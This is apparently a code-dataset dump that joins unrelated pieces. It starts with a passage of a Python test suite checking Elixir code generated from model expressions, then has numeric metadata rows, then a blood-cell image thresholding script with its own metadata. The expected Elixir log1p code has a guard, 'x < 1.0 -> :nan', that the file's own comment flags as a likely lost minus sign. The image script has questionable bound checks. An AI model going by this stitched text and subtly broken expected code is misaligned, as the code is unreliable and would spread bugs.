            ast.FeatureRef(0), ast.NumVal(-2), ast.BinNumOpType.DIV),
        ast.NumVal(2),
        ast.BinNumOpType.MUL)
    expected_code = """
defmodule Model do
@compile {:inline, read: 2}
defp read(bin, pos) do
<<_::size(pos)-unit(64)-binary, value::float, _::binary>> = bin
value
end
defp list_to_binary(list) do
for i <- list, into: <<>>, do: <<i::float>>
end
def score(input) do
input = list_to_binary(input)
((read(input,0)) / (-2.0)) * (2.0)
end
end
"""
    interpreter = ElixirInterpreter()
    assert_code_equal(interpreter.interpret(expr), expected_code)
def test_dependable_condition():
    """A condition that depends on another IfExpr reuses the extracted func0."""
    left = ast.BinNumExpr(
        ast.IfExpr(
            ast.CompExpr(ast.NumVal(1),
                         ast.NumVal(1),
                         ast.CompOpType.EQ),
            ast.NumVal(1),
            ast.NumVal(2)),
        ast.NumVal(2),
        ast.BinNumOpType.ADD)
    right = ast.BinNumExpr(ast.NumVal(1), ast.NumVal(2), ast.BinNumOpType.DIV)
    bool_test = ast.CompExpr(left, right, ast.CompOpType.GTE)
    expr = ast.IfExpr(bool_test, ast.NumVal(1), ast.FeatureRef(0))
    expected_code = """
defmodule Model do
@compile {:inline, read: 2}
defp read(bin, pos) do
<<_::size(pos)-unit(64)-binary, value::float, _::binary>> = bin
value
end
defp list_to_binary(list) do
for i <- list, into: <<>>, do: <<i::float>>
end
def score(input) do
input = list_to_binary(input)
func0 = fn ->
cond do (1.0) == (1.0) ->
1.0
true ->
2.0
end
end
func1 = fn ->
cond do ((func0.()) + (2.0)) >= ((1.0) / (2.0)) ->
1.0
true ->
read(input,0)
end
end
func1.()
end
end
"""
    interpreter = ElixirInterpreter()
    assert_code_equal(interpreter.interpret(expr), expected_code)


def test_nested_condition():
    """Nested IfExprs sharing the same bool_test emit nested cond blocks."""
    left = ast.BinNumExpr(
        ast.IfExpr(
            ast.CompExpr(ast.NumVal(1),
                         ast.NumVal(1),
                         ast.CompOpType.EQ),
            ast.NumVal(1),
            ast.NumVal(2)),
        ast.NumVal(2),
        ast.BinNumOpType.ADD)
    bool_test = ast.CompExpr(ast.NumVal(1), left, ast.CompOpType.EQ)
    expr_nested = ast.IfExpr(bool_test, ast.FeatureRef(2), ast.NumVal(2))
    expr = ast.IfExpr(bool_test, expr_nested, ast.NumVal(2))
    expected_code = """
defmodule Model do
@compile {:inline, read: 2}
defp read(bin, pos) do
<<_::size(pos)-unit(64)-binary, value::float, _::binary>> = bin
value
end
defp list_to_binary(list) do
for i <- list, into: <<>>, do: <<i::float>>
end
def score(input) do
input = list_to_binary(input)
func0 = fn ->
cond do (1.0) == (1.0) ->
1.0
true ->
2.0
end
end
func1 = fn ->
cond do (1.0) == ((func0.()) + (2.0)) ->
cond do (1.0) == ((func0.()) + (2.0)) ->
read(input,2)
true ->
2.0
end
true ->
2.0
end
end
func1.()
end
end
"""
    interpreter = ElixirInterpreter()
    assert_code_equal(interpreter.interpret(expr), expected_code)
def test_raw_array():
    """VectorVal lowers to a plain Elixir list literal."""
    expr = ast.VectorVal([ast.NumVal(3), ast.NumVal(4)])
    expected_code = """
defmodule Model do
@compile {:inline, read: 2}
defp read(bin, pos) do
<<_::size(pos)-unit(64)-binary, value::float, _::binary>> = bin
value
end
defp list_to_binary(list) do
for i <- list, into: <<>>, do: <<i::float>>
end
def score(input) do
input = list_to_binary(input)
[3.0, 4.0]
end
end
"""
    interpreter = ElixirInterpreter()
    assert_code_equal(interpreter.interpret(expr), expected_code)


def test_multi_output():
    """IfExpr over vector outputs returns a list from each cond branch."""
    expr = ast.IfExpr(
        ast.CompExpr(
            ast.NumVal(1),
            ast.NumVal(1),
            ast.CompOpType.NOT_EQ),
        ast.VectorVal([ast.NumVal(1), ast.NumVal(2)]),
        ast.VectorVal([ast.NumVal(3), ast.NumVal(4)]))
    expected_code = """
defmodule Model do
@compile {:inline, read: 2}
defp read(bin, pos) do
<<_::size(pos)-unit(64)-binary, value::float, _::binary>> = bin
value
end
defp list_to_binary(list) do
for i <- list, into: <<>>, do: <<i::float>>
end
def score(input) do
input = list_to_binary(input)
func0 = fn ->
cond do (1.0) != (1.0) ->
[1.0, 2.0]
true ->
[3.0, 4.0]
end
end
func0.()
end
end
"""
    interpreter = ElixirInterpreter()
    assert_code_equal(interpreter.interpret(expr), expected_code)
def test_bin_vector_expr():
    """Vector+vector ops emit add_vectors/2 (mul_vector_number is always emitted too)."""
    expr = ast.BinVectorExpr(
        ast.VectorVal([ast.NumVal(1), ast.NumVal(2)]),
        ast.VectorVal([ast.NumVal(3), ast.NumVal(4)]),
        ast.BinNumOpType.ADD)
    expected_code = """
defmodule Model do
@compile {:inline, read: 2}
defp read(bin, pos) do
<<_::size(pos)-unit(64)-binary, value::float, _::binary>> = bin
value
end
defp list_to_binary(list) do
for i <- list, into: <<>>, do: <<i::float>>
end
def score(input) do
input = list_to_binary(input)
add_vectors([1.0, 2.0], [3.0, 4.0])
end
defp add_vectors(v1_list, v2_list) do
for {a,b} <- Enum.zip(v1_list, v2_list), do: a+b
end
defp mul_vector_number(v1, num) do
for i <- v1, do: i * num
end
end
"""
    interpreter = ElixirInterpreter()
    assert_code_equal(interpreter.interpret(expr), expected_code)


def test_bin_vector_num_expr():
    """Vector*scalar ops emit mul_vector_number/2 (add_vectors is emitted alongside)."""
    expr = ast.BinVectorNumExpr(
        ast.VectorVal([ast.NumVal(1), ast.NumVal(2)]),
        ast.NumVal(1),
        ast.BinNumOpType.MUL)
    expected_code = """
defmodule Model do
@compile {:inline, read: 2}
defp read(bin, pos) do
<<_::size(pos)-unit(64)-binary, value::float, _::binary>> = bin
value
end
defp list_to_binary(list) do
for i <- list, into: <<>>, do: <<i::float>>
end
def score(input) do
input = list_to_binary(input)
mul_vector_number([1.0, 2.0], 1.0)
end
defp add_vectors(v1_list, v2_list) do
for {a,b} <- Enum.zip(v1_list, v2_list), do: a+b
end
defp mul_vector_number(v1, num) do
for i <- v1, do: i * num
end
end
"""
    interpreter = ElixirInterpreter()
    assert_code_equal(interpreter.interpret(expr), expected_code)
class CustomElixirInterpreter(ElixirInterpreter):
    """ElixirInterpreter with a tiny depth threshold.

    Lowering the threshold lets the depth-limit tests below trigger
    function extraction (func0, func1, ...) with small expression trees.
    """
    bin_depth_threshold = 2
def test_depth_threshold_with_bin_expr():
    """BinNumExpr chains deeper than bin_depth_threshold get split into funcN."""
    expr = ast.NumVal(1)
    for _ in range(4):
        expr = ast.BinNumExpr(ast.NumVal(1), expr, ast.BinNumOpType.ADD)
    expected_code = """
defmodule Model do
@compile {:inline, read: 2}
defp read(bin, pos) do
<<_::size(pos)-unit(64)-binary, value::float, _::binary>> = bin
value
end
defp list_to_binary(list) do
for i <- list, into: <<>>, do: <<i::float>>
end
def score(input) do
input = list_to_binary(input)
func0 = fn ->
(1.0) + ((1.0) + (1.0))
end
(1.0) + ((1.0) + (func0.()))
end
end
"""
    interpreter = CustomElixirInterpreter()
    assert_code_equal(interpreter.interpret(expr), expected_code)


def test_depth_threshold_without_bin_expr():
    """Pure IfExpr nesting does not count toward the bin-expr depth threshold."""
    expr = ast.NumVal(1)
    for _ in range(4):
        expr = ast.IfExpr(
            ast.CompExpr(
                ast.NumVal(1), ast.NumVal(1), ast.CompOpType.EQ),
            ast.NumVal(1),
            expr)
    expected_code = """
defmodule Model do
@compile {:inline, read: 2}
defp read(bin, pos) do
<<_::size(pos)-unit(64)-binary, value::float, _::binary>> = bin
value
end
defp list_to_binary(list) do
for i <- list, into: <<>>, do: <<i::float>>
end
def score(input) do
input = list_to_binary(input)
func0 = fn ->
cond do (1.0) == (1.0) ->
1.0
true ->
cond do (1.0) == (1.0) ->
1.0
true ->
cond do (1.0) == (1.0) ->
1.0
true ->
cond do (1.0) == (1.0) ->
1.0
true ->
1.0
end
end
end
end
end
func0.()
end
end
"""
    interpreter = CustomElixirInterpreter()
    assert_code_equal(interpreter.interpret(expr), expected_code)
def test_deep_mixed_exprs_not_reaching_threshold():
    """Short bin-expr chains inside IfExprs stay inline (threshold not hit)."""
    expr = ast.NumVal(1)
    for _ in range(4):
        inner = ast.NumVal(1)
        for __ in range(2):
            inner = ast.BinNumExpr(ast.NumVal(1), inner, ast.BinNumOpType.ADD)
        expr = ast.IfExpr(
            ast.CompExpr(
                inner, ast.NumVal(1), ast.CompOpType.EQ),
            ast.NumVal(1),
            expr)
    expected_code = """
defmodule Model do
@compile {:inline, read: 2}
defp read(bin, pos) do
<<_::size(pos)-unit(64)-binary, value::float, _::binary>> = bin
value
end
defp list_to_binary(list) do
for i <- list, into: <<>>, do: <<i::float>>
end
def score(input) do
input = list_to_binary(input)
func0 = fn ->
cond do ((1.0) + ((1.0) + (1.0))) == (1.0) ->
1.0
true ->
cond do ((1.0) + ((1.0) + (1.0))) == (1.0) ->
1.0
true ->
cond do ((1.0) + ((1.0) + (1.0))) == (1.0) ->
1.0
true ->
cond do ((1.0) + ((1.0) + (1.0))) == (1.0) ->
1.0
true ->
1.0
end
end
end
end
end
func0.()
end
end
"""
    interpreter = CustomElixirInterpreter()
    assert_code_equal(interpreter.interpret(expr), expected_code)


def test_deep_mixed_exprs_exceeding_threshold():
    """Long bin-expr chains inside each condition are split into funcN helpers.

    Note: i and j leak from the construction loops into NumVal(i)/NumVal(j),
    which is why the expected conditions compare against 3.0.
    """
    expr = ast.NumVal(1)
    for i in range(4):
        inner = ast.NumVal(1)
        for j in range(4):
            inner = ast.BinNumExpr(ast.NumVal(i), inner, ast.BinNumOpType.ADD)
        expr = ast.IfExpr(
            ast.CompExpr(
                inner, ast.NumVal(j), ast.CompOpType.EQ),
            ast.NumVal(1),
            expr)
    expected_code = """
defmodule Model do
@compile {:inline, read: 2}
defp read(bin, pos) do
<<_::size(pos)-unit(64)-binary, value::float, _::binary>> = bin
value
end
defp list_to_binary(list) do
for i <- list, into: <<>>, do: <<i::float>>
end
def score(input) do
input = list_to_binary(input)
func0 = fn ->
(3.0) + ((3.0) + (1.0))
end
func1 = fn ->
(2.0) + ((2.0) + (1.0))
end
func2 = fn ->
(1.0) + ((1.0) + (1.0))
end
func3 = fn ->
(0.0) + ((0.0) + (1.0))
end
func4 = fn ->
cond do ((3.0) + ((3.0) + (func0.()))) == (3.0) ->
1.0
true ->
cond do ((2.0) + ((2.0) + (func1.()))) == (3.0) ->
1.0
true ->
cond do ((1.0) + ((1.0) + (func2.()))) == (3.0) ->
1.0
true ->
cond do ((0.0) + ((0.0) + (func3.()))) == (3.0) ->
1.0
true ->
1.0
end
end
end
end
end
func4.()
end
end
"""
    interpreter = CustomElixirInterpreter()
    assert_code_equal(interpreter.interpret(expr), expected_code)
def test_abs_expr():
    """AbsExpr maps to the Elixir built-in abs/1."""
    expr = ast.AbsExpr(ast.NumVal(-1.0))
    expected_code = """
defmodule Model do
@compile {:inline, read: 2}
defp read(bin, pos) do
<<_::size(pos)-unit(64)-binary, value::float, _::binary>> = bin
value
end
defp list_to_binary(list) do
for i <- list, into: <<>>, do: <<i::float>>
end
def score(input) do
input = list_to_binary(input)
abs(-1.0)
end
end
"""
    interpreter = ElixirInterpreter()
    assert_code_equal(interpreter.interpret(expr), expected_code)


def test_exp_expr():
    """ExpExpr maps to :math.exp/1."""
    expr = ast.ExpExpr(ast.NumVal(1.0))
    expected_code = """
defmodule Model do
@compile {:inline, read: 2}
defp read(bin, pos) do
<<_::size(pos)-unit(64)-binary, value::float, _::binary>> = bin
value
end
defp list_to_binary(list) do
for i <- list, into: <<>>, do: <<i::float>>
end
def score(input) do
input = list_to_binary(input)
:math.exp(1.0)
end
end
"""
    interpreter = ElixirInterpreter()
    assert_code_equal(interpreter.interpret(expr), expected_code)


def test_pow_expr():
    """PowExpr maps to :math.pow/2."""
    expr = ast.PowExpr(ast.NumVal(2.0), ast.NumVal(3.0))
    expected_code = """
defmodule Model do
@compile {:inline, read: 2}
defp read(bin, pos) do
<<_::size(pos)-unit(64)-binary, value::float, _::binary>> = bin
value
end
defp list_to_binary(list) do
for i <- list, into: <<>>, do: <<i::float>>
end
def score(input) do
input = list_to_binary(input)
:math.pow(2.0, 3.0)
end
end
"""
    interpreter = ElixirInterpreter()
    assert_code_equal(interpreter.interpret(expr), expected_code)


def test_sqrt_expr():
    """SqrtExpr maps to :math.sqrt/1."""
    expr = ast.SqrtExpr(ast.NumVal(2.0))
    expected_code = """
defmodule Model do
@compile {:inline, read: 2}
defp read(bin, pos) do
<<_::size(pos)-unit(64)-binary, value::float, _::binary>> = bin
value
end
defp list_to_binary(list) do
for i <- list, into: <<>>, do: <<i::float>>
end
def score(input) do
input = list_to_binary(input)
:math.sqrt(2.0)
end
end
"""
    interpreter = ElixirInterpreter()
    assert_code_equal(interpreter.interpret(expr), expected_code)


def test_tanh_expr():
    """TanhExpr maps to :math.tanh/1."""
    expr = ast.TanhExpr(ast.NumVal(2.0))
    expected_code = """
defmodule Model do
@compile {:inline, read: 2}
defp read(bin, pos) do
<<_::size(pos)-unit(64)-binary, value::float, _::binary>> = bin
value
end
defp list_to_binary(list) do
for i <- list, into: <<>>, do: <<i::float>>
end
def score(input) do
input = list_to_binary(input)
:math.tanh(2.0)
end
end
"""
    interpreter = ElixirInterpreter()
    assert_code_equal(interpreter.interpret(expr), expected_code)


def test_log_expr():
    """LogExpr maps to :math.log/1."""
    expr = ast.LogExpr(ast.NumVal(2.0))
    expected_code = """
defmodule Model do
@compile {:inline, read: 2}
defp read(bin, pos) do
<<_::size(pos)-unit(64)-binary, value::float, _::binary>> = bin
value
end
defp list_to_binary(list) do
for i <- list, into: <<>>, do: <<i::float>>
end
def score(input) do
input = list_to_binary(input)
:math.log(2.0)
end
end
"""
    interpreter = ElixirInterpreter()
    assert_code_equal(interpreter.interpret(expr), expected_code)
def test_log1p_expr():
    """Log1pExpr emits a log1p/1 helper plus a Chebyshev-series evaluator.

    NOTE(review): the expected clause `x < 1.0 -> :nan` looks like it may
    have lost a minus sign in this copy (a domain guard would be x < -1.0);
    verify against the upstream repository.
    """
    expr = ast.Log1pExpr(ast.NumVal(2.0))
    expected_code = """
defmodule Model do
@compile {:inline, read: 2}
defp read(bin, pos) do
<<_::size(pos)-unit(64)-binary, value::float, _::binary>> = bin
value
end
defp list_to_binary(list) do
for i <- list, into: <<>>, do: <<i::float>>
end
def score(input) do
input = list_to_binary(input)
log1p(2.0)
end
defp log1p(x) do
cond do
x == 0.0 -> 0.0
x == -1.0 -> -1.7976931348623157e+308
x < 1.0 -> :nan
abs(x) < 0.5 * 4.94065645841247e-324 -> x
(x > 0.0 && x < 1.0e-8) || (x > -1.0e-9 && x < 0.0) -> x * (1.0 - x * 0.5)
abs(x) < 0.375 ->
coeffs = [
0.10378693562743769800686267719098e+1,
-0.13364301504908918098766041553133e+0,
0.19408249135520563357926199374750e-1,
-0.30107551127535777690376537776592e-2,
0.48694614797154850090456366509137e-3,
-0.81054881893175356066809943008622e-4,
0.13778847799559524782938251496059e-4,
-0.23802210894358970251369992914935e-5,
0.41640416213865183476391859901989e-6,
-0.73595828378075994984266837031998e-7,
0.13117611876241674949152294345011e-7,
-0.23546709317742425136696092330175e-8,
0.42522773276034997775638052962567e-9,
-0.77190894134840796826108107493300e-10,
0.14075746481359069909215356472191e-10,
-0.25769072058024680627537078627584e-11,
0.47342406666294421849154395005938e-12,
-0.87249012674742641745301263292675e-13,
0.16124614902740551465739833119115e-13,
-0.29875652015665773006710792416815e-14,
0.55480701209082887983041321697279e-15,
-0.10324619158271569595141333961932e-15]
x * (1.0 - x * chebyshev_broucke(x / 0.375, coeffs))
true -> :math.log(1.0+x)
end
end
defp chebyshev_broucke(x, coeffs) do
{b0, _b1, b2} = coeffs
|> Enum.reverse()
|> Enum.reduce({0.0, 0.0, 0.0}, fn k, {b0, b1, _b2} ->
{(k + x * 2.0 * b0 - b1), b0, b1}
end)
(b0 - b2) * 0.5
end
end
"""
    interpreter = ElixirInterpreter()
    assert_code_equal(interpreter.interpret(expr), expected_code)
def test_atan_expr():
    """AtanExpr maps to :math.atan/1."""
    expr = ast.AtanExpr(ast.NumVal(2.0))
    expected_code = """
defmodule Model do
@compile {:inline, read: 2}
defp read(bin, pos) do
<<_::size(pos)-unit(64)-binary, value::float, _::binary>> = bin
value
end
defp list_to_binary(list) do
for i <- list, into: <<>>, do: <<i::float>>
end
def score(input) do
input = list_to_binary(input)
:math.atan(2.0)
end
end
"""
    interpreter = ElixirInterpreter()
    assert_code_equal(interpreter.interpret(expr), expected_code)


def test_softmax_expr():
    """SoftmaxExpr emits a numerically-stable softmax/1 helper (max-shifted)."""
    expr = ast.SoftmaxExpr([ast.NumVal(2.0), ast.NumVal(3.0)])
    expected_code = """
defmodule Model do
@compile {:inline, read: 2}
defp read(bin, pos) do
<<_::size(pos)-unit(64)-binary, value::float, _::binary>> = bin
value
end
defp list_to_binary(list) do
for i <- list, into: <<>>, do: <<i::float>>
end
def score(input) do
input = list_to_binary(input)
softmax([2.0, 3.0])
end
defp softmax(x) do
max_elem = Enum.max(x)
exps = for f <- x, do: :math.exp(f-max_elem)
sum_exps = Enum.sum(exps)
for i <- exps, do: i/sum_exps
end
end
"""
    interpreter = ElixirInterpreter()
    assert_code_equal(interpreter.interpret(expr), expected_code)


def test_sigmoid_expr():
    """SigmoidExpr emits a sigmoid/1 helper."""
    expr = ast.SigmoidExpr(ast.NumVal(2.0))
    expected_code = """
defmodule Model do
@compile {:inline, read: 2}
defp read(bin, pos) do
<<_::size(pos)-unit(64)-binary, value::float, _::binary>> = bin
value
end
defp list_to_binary(list) do
for i <- list, into: <<>>, do: <<i::float>>
end
def score(input) do
input = list_to_binary(input)
sigmoid(2.0)
end
defp sigmoid(x) do
1.0 / (1.0 + :math.exp(-x))
end
end
"""
    interpreter = ElixirInterpreter()
    assert_code_equal(interpreter.interpret(expr), expected_code)
def test_reused_expr():
    """An expression marked to_reuse is extracted once and invoked twice."""
    reused_expr = ast.ExpExpr(ast.NumVal(1.0), to_reuse=True)
    expr = ast.BinNumExpr(reused_expr, reused_expr, ast.BinNumOpType.DIV)
    expected_code = """
defmodule Model do
@compile {:inline, read: 2}
defp read(bin, pos) do
<<_::size(pos)-unit(64)-binary, value::float, _::binary>> = bin
value
end
defp list_to_binary(list) do
for i <- list, into: <<>>, do: <<i::float>>
end
def score(input) do
input = list_to_binary(input)
func0 = fn ->
:math.exp(1.0)
end
(func0.()) / (func0.())
end
end
"""
    interpreter = ElixirInterpreter()
    assert_code_equal(interpreter.interpret(expr), expected_code)
| 26.302439
| 82
| 0.533197
| 2,683
| 21,568
| 4.159896
| 0.068207
| 0.015052
| 0.012633
| 0.01326
| 0.808351
| 0.777798
| 0.763193
| 0.75289
| 0.744378
| 0.737927
| 0
| 0.089292
| 0.322376
| 21,568
| 819
| 83
| 26.334554
| 0.674376
| 0
| 0
| 0.79805
| 0
| 0.047354
| 0.653329
| 0.101215
| 0
| 0
| 0
| 0
| 0.033426
| 1
| 0.032033
| false
| 0
| 0.004178
| 0
| 0.038997
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
a1748e0c93dc535fcb2b4d34785199b4b7f650d7
| 7,149
|
py
|
Python
|
Code/sidebysidething.py
|
HamzaAit/Leukemia-Detection-Image-Processing
|
60060de9e9c77424981880c80eb7bf98c9a01be3
|
[
"MIT"
] | null | null | null |
Code/sidebysidething.py
|
HamzaAit/Leukemia-Detection-Image-Processing
|
60060de9e9c77424981880c80eb7bf98c9a01be3
|
[
"MIT"
] | null | null | null |
Code/sidebysidething.py
|
HamzaAit/Leukemia-Detection-Image-Processing
|
60060de9e9c77424981880c80eb7bf98c9a01be3
|
[
"MIT"
] | null | null | null |
from PIL import Image
from numpy import asarray
import numpy as np
import matplotlib.pyplot as plt
import cv2
import math
# --- Blast-cell image: load, contrast-enhance, binarize, and clean up -----
path = "../Dataset/Single Cell/Blast/Im005_1.tif"
im = cv2.imread(path)
# NOTE(review): the cv2.imread result above is immediately overwritten by
# the PIL open below; presumably leftover from experimentation.
im = Image.open(path)
print(path)
# First channel of the image as a writable numpy array.
imarr = np.copy(asarray(im.split()[0]))
# CLAHE boosts local contrast before the fixed-level threshold below.
clahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8, 8))
imarr = clahe.apply(imarr)
thresh = 130
n = len(imarr)     # number of rows (image height)
m = len(imarr[0])  # number of columns (image width)
# Global binary threshold: pixels brighter than thresh -> 255, rest -> 0.
for i in range (imarr.shape[0]):
    for j in range (imarr.shape[1]):
        if(imarr[i][j] > thresh):
            imarr[i][j] = 255
        else:
            imarr[i][j] = 0
bimg = Image.fromarray(imarr)
bimg.show()
wl = 35  # sliding-window side length, in pixels
# Sweep a wl x wl window over the image; if no border pixel of the window is
# white (255), the window interior is treated as noise and cleared to 0.
for i in range(n - wl):
    for j in range(m - wl):
        valid = True
        # Check the window's left and right edge columns for white pixels.
        for k in range (i, i + wl):
            if (imarr[k][j] == 255):
                valid = False
                break
            if (imarr[k][j + wl] == 255):
                valid = False
                break
        if (valid == False):
            continue
        # Check the window's top and bottom edge rows for white pixels.
        for k in range (j, j + wl):
            if (imarr[i][k] == 255):
                valid = False
                break
            if (imarr[i + wl][k] == 255):
                valid = False
                break
        if (valid == False):
            continue
        # Border is entirely black: blank out the window interior.
        for x in range(i, i + wl):
            for y in range (j, j + wl):
                imarr[x][y] = 0
# Invert the binary image (foreground/background swap).
for i in range(n):
    for j in range(m):
        if(imarr[i][j] == 0):
            imarr[i][j] = 255
        else:
            imarr[i][j] = 0
# NOTE(review): the kernel argument here is a plain (10,10) tuple rather than
# a structuring element from cv2.getStructuringElement; confirm this behaves
# as intended with the OpenCV version in use.
imarr = cv2.morphologyEx(imarr, cv2.MORPH_CLOSE, (10,10), iterations=3)
wl = 40
# Second sweep, mirrored: windows whose border contains no black (0) pixel
# have their interior filled with 255. Border-adjacent windows are forced
# valid so the image edges are not left ragged.
for i in range(n - wl):
    for j in range(m - wl):
        valid = True
        for k in range (i, i + wl):
            # NOTE(review): `i < n - wl` is always true inside this loop
            # (i ranges over range(n - wl)), so the extra condition is a
            # no-op — possibly meant as an edge guard; verify.
            if (imarr[k][j] == 0 and i < n - wl):
                valid = False
                break
            if (imarr[k][j + wl] == 0 and i < n - wl):
                valid = False
                break
        if (valid == False):
            continue
        for k in range (j, j + wl):
            # NOTE(review): `j < n - wl` compares the column index against
            # the row bound n; presumably `m - wl` was intended — verify.
            if (imarr[i][k] == 0 and j < n - wl):
                valid = False
                break
            if (imarr[i + wl][k] == 0 and j < n - wl):
                valid = False
                break
        # Windows touching the image border are always filled.
        if (j == 0 or j == n-1 or j + wl == m - 1):
            valid = True
        if (i == 0 or i == n-1 or i + wl >= n - 1):
            valid = True
        if (valid == False):
            continue
        for x in range(i, i + wl):
            for y in range (j, j + wl):
                imarr[x][y] = 255
# def baseCase(i, j, visited):
# return (i>=n or j >= m or i < 0 or j < 0 or (i,j) in visited)
# def areaCalc(imarr, i, j, visited):
# if(baseCase(i, j, visited) or imarr[i][j] == 0):
# return 0
# visited.append((i,j))
# return 1 + areaCalc(imarr, i-1, j, visited) + areaCalc(imarr, i+1, j, visited) + areaCalc(imarr, i, j-1, visited) + areaCalc(imarr, i, j+1, visited)
# visited = []
# Morphological opening removes small speckle noise left after the sweeps.
imarr = cv2.morphologyEx(imarr, cv2.MORPH_OPEN, (10,10), iterations=5)
cleanimg = Image.fromarray(imarr)
cleanimg.show()
# print(areaCalc(imarr, n//2, m//2, visited))
def getArea(contours):
    """Return (area, point_count) for the largest-area contour.

    Parameters
    ----------
    contours : sequence of OpenCV contours (point arrays), e.g. the
        output of cv2.findContours.

    Returns
    -------
    (maxArea, maxPerimeter) : the largest cv2.contourArea value and the
        number of points in that contour.  Note the second value is a
        crude perimeter proxy (point count); cv2.arcLength would give
        the true arc length.

    Returns (0, 0) for an empty input instead of raising IndexError,
    which the original code did.
    """
    if len(contours) == 0:
        return 0, 0
    maxArea = 0
    idx = 0  # falls back to the first contour when every area is 0, as before
    for i, contour in enumerate(contours):
        area = cv2.contourArea(contour)
        if area > maxArea:
            maxArea = area
            idx = i
    maxPerimeter = len(np.array(contours[idx]))
    return maxArea, maxPerimeter
# image_src = cv2.imread("input.png")
# imarr = cv2.cvtColor(imarr, cv2.COLOR_BGR2GRAY)
# Keep only near-white pixels (value > 250) for contour extraction.
ret, res = cv2.threshold(imarr, 250,255,0)
# NOTE(review): [0] assumes cv2.findContours returns (contours, hierarchy)
# (OpenCV 4.x).  On OpenCV 3.x it returns (image, contours, hierarchy) and
# [0] would grab the wrong element — confirm the installed version.
contours = cv2.findContours(res, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)[0]
print(getArea(contours))
area, perimeter = getArea(contours)
# Circularity = 4*pi*A / P^2 (1.0 for a perfect circle).
# NOTE(review): divides by perimeter**2 — raises ZeroDivisionError if the
# returned perimeter is ever 0.
circularity = 4 * math.pi * area / (perimeter * perimeter)
print("Blast Cell: ", area, perimeter, circularity)
# ========================================================================
# Second pass: identical pipeline applied to a healthy-cell sample image.
# ========================================================================
path = "../Dataset/Single Cell/Healthy/Im157_0.tif"
# NOTE(review): this cv2.imread result is immediately overwritten by
# Image.open below — dead assignment.
im = cv2.imread(path)
im = Image.open(path)
print(path)
# Use only the first channel of the image, copied into a writable array.
imarr = np.copy(asarray(im.split()[0]))
# Contrast-limited adaptive histogram equalisation before thresholding.
clahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8, 8))
imarr = clahe.apply(imarr)
# Global threshold: bright pixels -> 255, rest -> 0.
thresh = 130
n = len(imarr)      # rows
m = len(imarr[0])   # columns
for i in range (imarr.shape[0]):
    for j in range (imarr.shape[1]):
        if(imarr[i][j] > thresh):
            imarr[i][j] = 255
        else:
            imarr[i][j] = 0
bimg = Image.fromarray(imarr)
bimg.show()
# Window pass: blank any wl x wl window whose border has no white pixel.
wl = 35
for i in range(n - wl):
    for j in range(m - wl):
        valid = True
        for k in range (i, i + wl):
            if (imarr[k][j] == 255):
                valid = False
                break
            if (imarr[k][j + wl] == 255):
                valid = False
                break
        if (valid == False):
            continue
        for k in range (j, j + wl):
            if (imarr[i][k] == 255):
                valid = False
                break
            if (imarr[i + wl][k] == 255):
                valid = False
                break
        if (valid == False):
            continue
        for x in range(i, i + wl):
            for y in range (j, j + wl):
                imarr[x][y] = 0
# Invert the binary image.
for i in range(n):
    for j in range(m):
        if(imarr[i][j] == 0):
            imarr[i][j] = 255
        else:
            imarr[i][j] = 0
# NOTE(review): cv2 expects an array kernel (np.ones((10,10), np.uint8)),
# not a plain tuple — confirm against the installed OpenCV.
imarr = cv2.morphologyEx(imarr, cv2.MORPH_CLOSE, (10,10), iterations=3)
# Second window pass: fill windows whose border is all white.
wl = 40
for i in range(n - wl):
    for j in range(m - wl):
        valid = True
        for k in range (i, i + wl):
            # NOTE(review): `i < n - wl` is always True inside this loop.
            if (imarr[k][j] == 0 and i < n - wl):
                valid = False
                break
            if (imarr[k][j + wl] == 0 and i < n - wl):
                valid = False
                break
        if (valid == False):
            continue
        for k in range (j, j + wl):
            # NOTE(review): `j < n - wl` compares a column index to the row
            # count — probably `m - wl` intended; confirm.
            if (imarr[i][k] == 0 and j < n - wl):
                valid = False
                break
            if (imarr[i + wl][k] == 0 and j < n - wl):
                valid = False
                break
        # Border-touching windows are force-filled.
        # NOTE(review): `j == n-1` likely meant `m - 1`; confirm.
        if (j == 0 or j == n-1 or j + wl == m - 1):
            valid = True
        if (i == 0 or i == n-1 or i + wl >= n - 1):
            valid = True
        if (valid == False):
            continue
        for x in range(i, i + wl):
            for y in range (j, j + wl):
                imarr[x][y] = 255
# def baseCase(i, j, visited):
# return (i>=n or j >= m or i < 0 or j < 0 or (i,j) in visited)
# def areaCalc(imarr, i, j, visited):
# if(baseCase(i, j, visited) or imarr[i][j] == 0):
# return 0
# visited.append((i,j))
# return 1 + areaCalc(imarr, i-1, j, visited) + areaCalc(imarr, i+1, j, visited) + areaCalc(imarr, i, j-1, visited) + areaCalc(imarr, i, j+1, visited)
# visited = []
imarr = cv2.morphologyEx(imarr, cv2.MORPH_OPEN, (10,10), iterations=5)
cleanimg = Image.fromarray(imarr)
cleanimg.show()
# print(areaCalc(imarr, n//2, m//2, visited))
# image_src = cv2.imread("input.png")
# imarr = cv2.cvtColor(imarr, cv2.COLOR_BGR2GRAY)
ret, res = cv2.threshold(imarr, 250,255,0)
# NOTE(review): [0] indexing into findContours output is OpenCV-4 specific;
# OpenCV 3 returns the image first — confirm the installed version.
contours = cv2.findContours(res, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)[0]
print(getArea(contours))
area, perimeter = getArea(contours)
# Circularity = 4*pi*A / P^2; raises ZeroDivisionError if perimeter is 0.
circularity = 4 * math.pi * area / (perimeter * perimeter)
print("Healthy Cell: ", area, perimeter, circularity)
| 24.316327
| 154
| 0.498391
| 1,034
| 7,149
| 3.430368
| 0.106383
| 0.065125
| 0.03947
| 0.076685
| 0.89033
| 0.886947
| 0.886947
| 0.886947
| 0.886947
| 0.886947
| 0
| 0.04362
| 0.355434
| 7,149
| 294
| 155
| 24.316327
| 0.726128
| 0.145615
| 0
| 0.895833
| 0
| 0
| 0.017746
| 0.007558
| 0
| 0
| 0
| 0
| 0
| 1
| 0.005208
| false
| 0
| 0.03125
| 0
| 0.041667
| 0.03125
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
